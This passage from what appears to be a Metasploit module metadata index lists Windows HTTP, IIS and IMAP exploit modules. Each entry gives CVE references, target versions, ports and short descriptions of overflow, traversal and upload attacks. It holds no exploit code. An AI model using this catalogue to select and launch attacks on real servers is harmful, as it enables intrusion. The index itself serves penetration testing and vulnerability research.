"ref_name": "windows/http/webster_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/xampp_webdav_upload_php": {
"name": "XAMPP WebDAV PHP Upload",
"full_name": "exploit/windows/http/xampp_webdav_upload_php",
"rank": 600,
"disclosure_date": "2012-01-14",
"type": "exploit",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module exploits weak WebDAV passwords on XAMPP servers.\n It uses supplied credentials to upload a PHP payload and\n execute it.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/http/xampp_webdav_upload_php.rb",
"is_install_path": true,
"ref_name": "windows/http/xampp_webdav_upload_php",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/xitami_if_mod_since": {
"name": "Xitami 2.5c2 Web Server If-Modified-Since Overflow",
"full_name": "exploit/windows/http/xitami_if_mod_since",
"rank": 200,
"disclosure_date": "2007-09-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the iMatix Corporation\n Xitami Web Server. If a malicious user sends an If-Modified-Since\n header containing an overly long string, it may be possible to\n execute a payload remotely. Due to size constraints, this module uses\n the Egghunter technique.",
"references": [
"CVE-2007-5067",
"OSVDB-40594",
"OSVDB-40595",
"BID-25772",
"EDB-4450"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"xigui32.exe Universal",
"xitami.exe Universal"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/xitami_if_mod_since.rb",
"is_install_path": true,
"ref_name": "windows/http/xitami_if_mod_since",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/zenworks_assetmgmt_uploadservlet": {
"name": "Novell ZENworks Asset Management Remote Execution",
"full_name": "exploit/windows/http/zenworks_assetmgmt_uploadservlet",
"rank": 600,
"disclosure_date": "2011-11-02",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a path traversal flaw in Novell ZENworks Asset Management\n 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file\n outside of the MalibuUploadDirectory and then make a secondary request that allows\n for arbitrary code execution.",
"references": [
"CVE-2011-2653",
"OSVDB-77583",
"BID-50966",
"ZDI-11-342",
"URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~"
],
"platform": "Java",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb",
"is_install_path": true,
"ref_name": "windows/http/zenworks_assetmgmt_uploadservlet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/zenworks_uploadservlet": {
"name": "Novell ZENworks Configuration Management Remote Execution",
"full_name": "exploit/windows/http/zenworks_uploadservlet",
"rank": 600,
"disclosure_date": "2010-03-30",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n and then make a secondary request that allows for arbitrary code execution.",
"references": [
"CVE-2010-5324",
"OSVDB-63412",
"BID-39114",
"ZDI-10-078",
"URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html",
"URL-http://www.novell.com/support/kb/doc.php?id=7005573"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Windows x86",
"Linux x86"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/http/zenworks_uploadservlet.rb",
"is_install_path": true,
"ref_name": "windows/http/zenworks_uploadservlet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/iis_webdav_scstoragepathfromurl": {
"name": "Microsoft IIS WebDav ScStoragePathFromUrl Overflow",
"full_name": "exploit/windows/iis/iis_webdav_scstoragepathfromurl",
"rank": 0,
"disclosure_date": "2017-03-26",
"type": "exploit",
"author": [
"Zhiniang Peng",
"Chen Wu",
"Dominic Chell <dominic@mdsec.co.uk>",
"firefart",
"zcgonvh <zcgonvh@qq.com>",
"Rich Whitcroft",
"Lincoln"
],
"description": "Buffer overflow in the ScStoragePathFromUrl function\n in the WebDAV service in Internet Information Services (IIS) 6.0\n in Microsoft Windows Server 2003 R2 allows remote attackers to\n execute arbitrary code via a long header beginning with\n \"If: <http://\" in a PROPFIND request, as exploited in the\n wild in July or August 2016.\n\n Original exploit by Zhiniang Peng and Chen Wu.",
"references": [
"CVE-2017-7269",
"BID-97127",
"URL-https://github.com/edwardz246003/IIS_exploit",
"URL-https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Microsoft Windows Server 2003 R2 SP2 x86"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb",
"is_install_path": true,
"ref_name": "windows/iis/iis_webdav_scstoragepathfromurl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"EXPLODINGCAN"
]
}
},
"exploit_windows/iis/iis_webdav_upload_asp": {
"name": "Microsoft IIS WebDAV Write Access Code Execution",
"full_name": "exploit/windows/iis/iis_webdav_upload_asp",
"rank": 600,
"disclosure_date": "1994-01-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to execute a payload on IIS servers that\n have world-writeable directories. The payload is uploaded as an ASP\n script via a WebDAV PUT request.\n\n The target IIS machine must meet these conditions to be considered\n as exploitable: It allows 'Script resource access', Read and Write\n permission, and supports ASP.",
"references": [
"OSVDB-397",
"BID-12141"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/iis_webdav_upload_asp.rb",
"is_install_path": true,
"ref_name": "windows/iis/iis_webdav_upload_asp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms01_023_printer": {
"name": "MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow",
"full_name": "exploit/windows/iis/ms01_023_printer",
"rank": 400,
"disclosure_date": "2001-05-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow in the request processor of\n the Internet Printing Protocol ISAPI module in IIS. This\n module works against Windows 2000 service pack 0 and 1. If\n the service stops responding after a successful compromise,\n run the exploit a couple more times to completely kill the\n hung process.",
"references": [
"CVE-2001-0241",
"OSVDB-3323",
"BID-2674",
"MSB-MS01-023",
"URL-https://seclists.org/lists/bugtraq/2001/May/0005.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English SP0-SP1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/iis/ms01_023_printer.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms01_023_printer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms01_026_dbldecode": {
"name": "MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution",
"full_name": "exploit/windows/iis/ms01_026_dbldecode",
"rank": 600,
"disclosure_date": "2001-05-15",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n NOTE: This module will leave a metasploit payload in the IIS scripts directory.",
"references": [
"CVE-2001-0333",
"OSVDB-556",
"BID-2708",
"MSB-MS01-026",
"URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms01_026_dbldecode",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms01_033_idq": {
"name": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow",
"full_name": "exploit/windows/iis/ms01_033_idq",
"rank": 400,
"disclosure_date": "2001-06-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.",
"references": [
"CVE-2001-0500",
"OSVDB-568",
"MSB-MS01-033",
"BID-2880"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English SP0",
"Windows 2000 Pro English SP1-SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/ms01_033_idq.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms01_033_idq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms02_018_htr": {
"name": "MS02-018 Microsoft IIS 4.0 .HTR Path Overflow",
"full_name": "exploit/windows/iis/ms02_018_htr",
"rank": 400,
"disclosure_date": "2002-04-10",
"type": "exploit",
"author": [
"stinko <vinnie@metasploit.com>"
],
"description": "This exploits a buffer overflow in the ISAPI ISM.DLL used to\n process HTR scripting in IIS 4.0. This module works against\n Windows NT 4 Service Packs 3, 4, and 5. The server will\n continue to process requests until the payload being\n executed has exited. If you've set EXITFUNC to 'seh', the\n server will continue processing requests, but you will have\n trouble terminating a bind shell. If you set EXITFUNC to\n thread, the server will crash upon exit of the bind shell.\n The payload is alpha-numerically encoded without a NOP sled\n because otherwise the data gets mangled by the filters.",
"references": [
"CVE-1999-0874",
"OSVDB-3325",
"BID-307",
"URL-http://www.eeye.com/html/research/advisories/AD19990608.html",
"MSB-MS02-018"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT 4.0 SP3",
"Windows NT 4.0 SP4",
"Windows NT 4.0 SP5"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/iis/ms02_018_htr.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms02_018_htr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms02_065_msadc": {
"name": "MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",
"full_name": "exploit/windows/iis/ms02_065_msadc",
"rank": 300,
"disclosure_date": "2002-11-20",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module can be used to execute arbitrary code on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service. The service is\n exploitable even when RDS is configured to deny remote connections\n (handsafe.reg). The service is vulnerable to a heap overflow where\n the RDS DataStub 'Content-Type' string is overly long. Microsoft Data\n Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.",
"references": [
"OSVDB-14502",
"BID-6214",
"CVE-2002-1142",
"MSB-MS02-065",
"URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 Pro English SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/iis/ms02_065_msadc.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms02_065_msadc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/ms03_007_ntdll_webdav": {
"name": "MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",
"full_name": "exploit/windows/iis/ms03_007_ntdll_webdav",
"rank": 500,
"disclosure_date": "2003-05-30",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n through the SEARCH WebDAV method in IIS. This particular\n module only works against Windows 2000. It should have a\n reasonable chance of success against any service pack.",
"references": [
"CVE-2003-0109",
"OSVDB-4467",
"BID-7116",
"MSB-MS03-007"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Brute Force"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb",
"is_install_path": true,
"ref_name": "windows/iis/ms03_007_ntdll_webdav",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/iis/msadc": {
"name": "MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution",
"full_name": "exploit/windows/iis/msadc",
"rank": 600,
"disclosure_date": "1998-07-17",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module can be used to execute arbitrary commands on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service using VbBusObj\n or AdvancedDataFactory to inject shell commands into Microsoft Access\n databases (MDBs), MSSQL databases and ODBC/JET Data Source Name (DSN).\n Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively\n used in the wild in the late Nineties. MDAC versions affected include MDAC\n 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS\n installed, and NT4 Servers with the NT Option Pack installed or upgraded\n 2000 systems often running IIS 3/4/5; however, some vulnerable installations\n can still be found on newer Windows operating systems. Note that newer\n releases of msadcs.dll can still be abused; however, by default remote\n connections to RDS are denied. Consider using VERBOSE if you're unable\n to successfully execute a command, as the error messages are detailed\n and useful for debugging. Also set NAME to obtain the remote hostname,\n and METHOD to use the alternative VbBusObj technique.",
"references": [
"OSVDB-272",
"BID-529",
"CVE-1999-1011",
"MSB-MS98-004",
"MSB-MS99-025"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 18:08:19 +0000",
"path": "/modules/exploits/windows/iis/msadc.rb",
"is_install_path": true,
"ref_name": "windows/iis/msadc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/imap/eudora_list": {
"name": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",
"full_name": "exploit/windows/imap/eudora_list",
"rank": 500,
"disclosure_date": "2005-12-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. You may be limited to\n only one attempt, so choose wisely!",
"references": [
"CVE-2005-4267",
"OSVDB-22097",
"BID-15980"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"WorldMail 3 Version 6.1.19.0",
"WorldMail 3 Version 6.1.20.0",
"WorldMail 3 Version 6.1.22.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/eudora_list.rb",
"is_install_path": true,
"ref_name": "windows/imap/eudora_list",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/imail_delete": {
"name": "IMail IMAP4D Delete Overflow",
"full_name": "exploit/windows/imap/imail_delete",
"rank": 200,
"disclosure_date": "2004-11-12",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This module exploits a buffer overflow in the 'DELETE'\n command of the IMail IMAP4D service. This vulnerability\n can only be exploited with a valid username and password.\n This flaw was patched in version 8.14.",
"references": [
"CVE-2004-1520",
"OSVDB-11838",
"BID-11675"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP sp0 comctl32.dll"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/imap/imail_delete.rb",
"is_install_path": true,
"ref_name": "windows/imap/imail_delete",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/ipswitch_search": {
"name": "Ipswitch IMail IMAP SEARCH Buffer Overflow",
"full_name": "exploit/windows/imap/ipswitch_search",
"rank": 200,
"disclosure_date": "2007-07-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n In order for this module to be successful, the IMAP user must have at least one\n message.",
"references": [
"CVE-2007-3925",
"OSVDB-36219",
"BID-24962"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows 2003 SP0 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/ipswitch_search.rb",
"is_install_path": true,
"ref_name": "windows/imap/ipswitch_search",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mailenable_login": {
"name": "MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow",
"full_name": "exploit/windows/imap/mailenable_login",
"rank": 500,
"disclosure_date": "2006-12-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the Login command.",
"references": [
"CVE-2006-6423",
"OSVDB-32125",
"BID-21492"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MailEnable 2.35 Pro",
"MailEnable 2.34 Pro"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mailenable_login.rb",
"is_install_path": true,
"ref_name": "windows/imap/mailenable_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mailenable_status": {
"name": "MailEnable IMAPD (1.54) STATUS Request Buffer Overflow",
"full_name": "exploit/windows/imap/mailenable_status",
"rank": 500,
"disclosure_date": "2005-07-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the STATUS command. With proper\n credentials, this could allow for the execution of arbitrary\n code.",
"references": [
"CVE-2005-2278",
"OSVDB-17844",
"BID-14243",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=19193"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MailEnable 1.54 Pro Universal",
"Windows XP Pro SP0/SP1 English",
"Windows 2000 Pro English ALL",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mailenable_status.rb",
"is_install_path": true,
"ref_name": "windows/imap/mailenable_status",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mailenable_w3c_select": {
"name": "MailEnable IMAPD W3C Logging Buffer Overflow",
"full_name": "exploit/windows/imap/mailenable_w3c_select",
"rank": 500,
"disclosure_date": "2005-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.",
"references": [
"CVE-2005-3155",
"OSVDB-19842",
"BID-15006"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MailEnable 1.54 Pro Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mailenable_w3c_select.rb",
"is_install_path": true,
"ref_name": "windows/imap/mailenable_w3c_select",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mdaemon_cram_md5": {
"name": "Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow",
"full_name": "exploit/windows/imap/mdaemon_cram_md5",
"rank": 500,
"disclosure_date": "2004-11-12",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module exploits a buffer overflow in the CRAM-MD5\n authentication of the MDaemon IMAP service. This\n vulnerability was discovered by Muts.",
"references": [
"CVE-2004-1520",
"OSVDB-11838",
"BID-11675"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MDaemon IMAP 8.0.3 Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mdaemon_cram_md5.rb",
"is_install_path": true,
"ref_name": "windows/imap/mdaemon_cram_md5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mdaemon_fetch": {
"name": "MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",
"full_name": "exploit/windows/imap/mdaemon_fetch",
"rank": 500,
"disclosure_date": "2008-03-13",
"type": "exploit",
"author": [
"Jacopo Cervini",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n account credentials are required. Credit to Matteo Memelli.",
"references": [
"CVE-2008-1358",
"OSVDB-43111",
"BID-28245",
"EDB-5248"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MDaemon Version 9.6.4"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/imap/mdaemon_fetch.rb",
"is_install_path": true,
"ref_name": "windows/imap/mdaemon_fetch",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercur_imap_select_overflow": {
"name": "Mercur v5.0 IMAP SP3 SELECT Buffer Overflow",
"full_name": "exploit/windows/imap/mercur_imap_select_overflow",
"rank": 200,
"disclosure_date": "2006-03-17",
"type": "exploit",
"author": [
"Jacopo Cervini <acaro@jervus.it>"
],
"description": "Mercur v5.0 IMAP server is prone to a remotely exploitable\n stack-based buffer overflow vulnerability. This issue is due\n to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.\n Credit to Tim Taylor for discovering the vulnerability.",
"references": [
"CVE-2006-1255",
"OSVDB-23950",
"BID-17138"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Server SP4 English",
"Windows 2000 Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mercur_imap_select_overflow.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercur_imap_select_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercur_login": {
"name": "Mercur Messaging 2005 IMAP Login Buffer Overflow",
"full_name": "exploit/windows/imap/mercur_login",
"rank": 200,
"disclosure_date": "2006-03-17",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n Since the room for shellcode is small, using the reverse ordinal payloads\n yields the best results.",
"references": [
"CVE-2006-1255",
"OSVDB-23950",
"BID-17138",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mercur_login.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercur_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercury_login": {
"name": "Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow",
"full_name": "exploit/windows/imap/mercury_login",
"rank": 300,
"disclosure_date": "2007-03-06",
"type": "exploit",
"author": [
"mu-b",
"MC <mc@metasploit.com>",
"Ivan Racic"
],
"description": "This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n LOGIN verb. By sending a specially crafted login command, a buffer\n is corrupted, and code execution is possible. This vulnerability was\n discovered by (mu-b at digit-labs.org).",
"references": [
"CVE-2007-1373",
"EDB-3418"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-10-28 09:41:14 +0000",
"path": "/modules/exploits/windows/imap/mercury_login.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercury_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/mercury_rename": {
"name": "Mercury/32 v4.01a IMAP RENAME Buffer Overflow",
"full_name": "exploit/windows/imap/mercury_rename",
"rank": 200,
"disclosure_date": "2004-11-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow vulnerability in the\n Mercury/32 v.4.01a IMAP service.",
"references": [
"CVE-2004-1211",
"OSVDB-12508",
"BID-11775",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=15867"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/mercury_rename.rb",
"is_install_path": true,
"ref_name": "windows/imap/mercury_rename",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_append": {
"name": "Novell NetMail IMAP APPEND Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_append",
"rank": 200,
"disclosure_date": "2006-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2006-6425",
"OSVDB-31362",
"BID-21723",
"ZDI-06-054"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_append.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_append",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_auth": {
"name": "Novell NetMail IMAP AUTHENTICATE Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_auth",
"rank": 200,
"disclosure_date": "2007-01-07",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n GSSAPI command. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n or windows/shell_reverse_tcp allows for the most reliable results.",
"references": [
"OSVDB-55175"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/imap/novell_netmail_auth.rb",
"is_install_path": true,
"ref_name": "windows/imap/novell_netmail_auth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/imap/novell_netmail_status": {
"name": "Novell NetMail IMAP STATUS Buffer Overflow",
"full_name": "exploit/windows/imap/novell_netmail_status",
"rank": 200,
"disclosure_date": "2005-11-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP STATUS\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.",
"references": [
"CVE-2005-3314",
"OSVDB-20956",
"BID-15491"
],
"platform": "Windows",
"arch": "",
"rport": 143,
"autofilter_ports": [
],
"autofilter_services": [
],
